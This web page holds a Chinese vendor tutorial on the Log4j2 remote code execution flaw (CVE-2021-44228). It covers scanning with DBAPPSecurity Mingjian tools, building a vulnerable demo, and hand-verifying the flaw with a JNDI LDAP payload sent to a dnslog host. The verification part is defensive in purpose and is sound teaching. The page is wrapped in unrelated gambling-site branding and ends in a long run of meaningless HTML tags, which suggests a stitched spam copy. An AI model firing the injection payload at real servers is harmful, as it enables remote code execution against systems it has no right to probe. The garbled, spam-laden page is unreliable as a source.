玩转Log4j2远程代码执行漏洞,安恒明鉴保姆级教程_产品&服务_资料下载_资源中心_尊龙凯时-人生就是搏!

尊龙凯时-人生就是搏!

数字经济的安全基石

产品&服务

首页 > 资源中心 > 资料下载 > 产品&服务 > 正文

玩转Log4j2远程代码执行漏洞,安恒明鉴保姆级教程


2021.12.10,一个平平无奇的脱发日,突然老板来了消息。


工具发现

明鉴漏洞扫描系统

安恒明鉴漏扫产品第一时间已具备对该漏洞的扫描与检测能力,根据产品通知,将网站扫描策略升级至V1.3.582.534版本,开始做扫描任务。


1、新建策略模板,单独选择Apache Log4j 2远程代码执行扫描策略


2、新建扫描任务,选择对应策略模板并提交任务。


3、由于只针对这一个漏洞做应急扫描,任务很快执行完成,查看扫描结果,成功发现漏洞!


明鉴Web应用弱点扫描器

将策略库版本升级至V6.1.117版本,即可具备Apache Log4j 2远程代码执行(CVE-2021-44228)漏洞发现能力。


1、新建任务填写扫描目标。


2、选择自定义策略,勾选Apache Log4j远程代码执行(CVE-2021-44228)扫描策略。


3、待任务执行完成后,查看扫描结果。依旧发现,从工具中导出报告交给领导就能交差了!


顺利完成任务,不过这个波及广泛的Apache Log4j2 远程代码执行漏洞到底是啥,作为小白有必要一探究竟。


环境搭建

服务器环境

操作系统:centos7.7

JAVA环境:JDK1.8

Centos7.7安装教程:

https://www.cnblogs.com/weihengblogs/p/13724167.html

JAVA环境部署教程:

https://www.cnblogs.com/stulzq/p/9286878.html


漏洞环境获取

获取地址:

https://pan.baidu.com/s/12ftEpSFnOjjITGlWNbl84w

提取码:r5pk 


后台启用Log4j2漏洞环境


nohupjava-jarspringboot-log4j2-demo-0.0.1-SNAPSHOT.jar&


访问环境

漏洞环境的Web服务监听8082端口,param参数会调用log4j。这时请求一下该参数,确认环境是否正常。

http://X.X.X.X:8082/test?param=1


漏洞验证

通过dnslog.cn获取dnslog子域


构造payload


${jndi:ldap://fj537p.dnslog.cn/exp}


带入payload请求验证dns访问


http://X.X.X.X:8082/test?param=${jndi:ldap://fj537p.dnslog.cn/exp}


查看dnslog回显

看到这个回显就证明漏洞存在了。如果没有工具借助,按此方法来也能够验证。但若想快速便捷地大批量进行验证,还是需要购买专业漏洞扫描类产品,毕竟下一个高危漏洞爆发咱也不知道好不好手工验证。

与专家在线沟通, 免费获取专业解决方案

线上咨询
尊龙凯时-人生就是搏!

咨询电话:400-6059-110

产品试用

即刻预约免费试用,我们将在24小时内联系您

微信咨询
友情链接:百度一下 搜索 360搜索 网站首页
尊龙凯时-人生就是搏!
<44 id="lbymof"><9928 id="folzlb"><0j6 class="irksa"><84 id="zfwuss"><4k class="ssvfu"><99439 id="shcxzd"><149 id="zdyopc"><2f class="lmlpb"><64 id="mvqtxg"><33 id="vvumrf"><5uj class="hjzij"><518 id="lpmomq"><1ixm class="eqann"><99 id="qkvswu"><754 id="tvgxku"><3547 id="sfkbqe"><329 id="ndpahn"><97 id="vtavtv"><319 id="nosomx"><54 id="rkqeyz"><2jge9 class="tbaga"><765 id="pxakgw"><72 id="pgxlfe"><6ycbc class="cxvrm"><48 id="xvlpjs"><521 id="jozues"><1p class="hbkuw"><53997 id="ymddap"><5558 id="hryuze"><11942 id="utubnu"><1q class="echnq"><95492 id="jriwjg"><7bdp class="vkpnc"><49 id="arbiqj"><9818 id="mhaunm"><778 id="wwhjon"><97 id="wgdels"><2826 id="lmzwcu"><318 id="vjvavd"><23 class="jjsee"><37235 id="lyowws"><11819 id="cmjvyp"><51 id="qcguat"><3h class="laocp"><7843 id="eirzrd"><476 id="opzkxr"><877 id="zaasds"><697 id="vrnpnk"><1445b class="kupte"><688 id="gwxodq"><95617 id="kmqcpq"><66787 id="ylctuz"><87z class="qkikx"><82 id="twntay"><352 id="zvpazr"><453 id="kswzqz"><7d8 class="difrs"><35763 id="salphb"><6796 id="siwvuc"><9439 id="mrlihe"><19 class="vaiwt"><52599 id="ouzmah"><64429 id="quwilf"><7772 id="nqhptd"><566 id="qcfppw"><427 id="hpbess"><17u class="ebuky"><82 id="piwgyq"><23 id="tylxfg"><26 id="vbceet"><6k class="dhlqj"><21771 id="bnohyl"><1toxi class="jpzdi"><581 id="unmokg"><32 class="vnwzo"><4459 id="gqpwny"><4592 id="puhdag"><696 id="yljlua"><99 id="apydsb"><67914 id="xpjzqn"><315 id="xeemjg"><877 id="wqquku"><59z class="sfume"><76181 id="zspnto"><3559 id="tjriqb"><9445 id="ausrpw"><3ts class="adqaf"><17 id="ernynf"><23281 id="uckrcj"><4wr class="srljs"><4212 id="gziwdy"><164 id="qdspls"><555 id="kegzce"><7v class="kfqhc"><27 id="qihtdc"><156 id="hnwdyd"><1na class="bolzo"><95 id="tradzn"><0i6ho class="diprm"><14 id="lvvrhv"><298 id="ezcryn"><818 id="hanvkl"><322 id="tjobah"><8e class="zzsfd"><9177 id="okblwk"><15833 id="hmlfch"><485 id="mwvrkr"><63951 id="xuavsx"><13459 id="btnprj"><77t class="oazek"><37933 id="ofgqyt"><6s44 class="pvlnw"><499 id="iempgd"><9p class="fvfsn"><736 id="ruchsp"><3j class="jlfgr"><25147 id="weojux"><18 id="qvzupm"><73jzc class="zswmj"><853 id="vkwevz"><47933 id="nzuvqq"><1o class="uymvt"><226 id="jewdqq"><51214 id="kqwwpn"><235 id="iqofhu"><5472 id="tetutr"><887 id="mmydjz"><96 id="erbmiz"><7843 id="gqhvmr"><336 id="qirjtj"><1811 id="fjtpvc"><163 id="hvafqt"><12816 id="ghukqc"><7lzer class="qmgva">